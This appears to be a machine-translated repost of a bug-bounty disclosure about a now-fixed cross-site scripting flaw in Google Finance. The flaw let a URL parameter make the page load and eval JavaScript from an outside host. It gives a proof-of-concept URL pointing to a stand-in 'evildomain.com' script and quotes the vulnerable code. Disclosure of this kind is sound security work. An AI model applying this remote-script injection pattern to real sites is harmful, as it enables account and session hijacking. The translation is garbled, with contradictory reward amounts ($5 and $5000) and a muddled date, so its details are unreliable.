How did I find an XSS vulnerability in Google finance and receive a reward of US dollars?

On June 23, July 30, we saw a blog post by Michelle Spagnuolo saying: "He found and submitted an XSS vulnerability on Google Finance. Google's security team confirmed and fixed the vulnerability. So Michelle received a $5 reward ." The following is a translation of the Michelin blog.

This problem occurs in Google Finance (google.com/finance ). It can fool Javascript's trend chart application (the source file is/finance/f/sfe-opt.js), let it load a file hosted on the external domain, then through eval () method to convert the file content into Javascript code and execute it.

This process does not require user interaction. You only need to click the URL.

Recurrence steps:

1) Click the URL (fixed currently ):

Https://www.google.com/finance? Chdet = 1214596800000 & q = NASDAQ: INTC & ntsp = 2 & ntrssurl = https://evildomain.com/x.js.

The file x. js contains the following verification code for Demonstration:

Alert (document. domain); the file must be hosted over https.
 

2) Remote Javascript Execution.

 

Working Principle

Below are two code snippets in/finance/f/sfe-opt.js that cause this security issue.

c.push("ntsp=");c.push(b);if (b == Vl.jj || b == Vl.kj) a = a.xc[ii(a.S)], a.lj() || (c.push("&ntrssurl="), c.push(escape(a.Cc || "")));return c.join("")

 

In the above Code, the URL parameter, more specifically, is obtained and connected to the ntrssurl parameter (the address of the user's RSS source.

 

Xi.prototype.send = function (a, b, c, d) {    a = a || null;    d = d || "_" + (Yi++).toString(36) + x().toString(36);    n._callbacks_ || (n._callbacks_ = {});    var e = this.$s.Z();    if (a)        for (var f in a) a.hasOwnProperty && !a.hasOwnProperty(f) || Fi(e, f, a[f]);     b && (n._callbacks_[d] = Zi(d, b), Fi(e, this.Zs, "_callbacks_." + d));    b = Wi(e.toString(), {        timeout: this.We,        Ns: !0    });    Si(b, null, $i(d, a, c), void 0);    return {        La: d,        Du: b    }};

The second code queries the news source in the external domain to display the content in the trend chart.

It generates a callback function name using the string "? _ CALLBACK. Function Wi performs the xmlhttprequest operation on the domain name in the ntrssurl parameter in the URL.

Then, a simple Javascript code is returned and executed using the eval () method.

Trigger XSS Vulnerability

Callback request

Code snippets with Vulnerabilities

This security risk was quickly fixed, and I was rewarded with $5000.

Thank you very much, Google security team!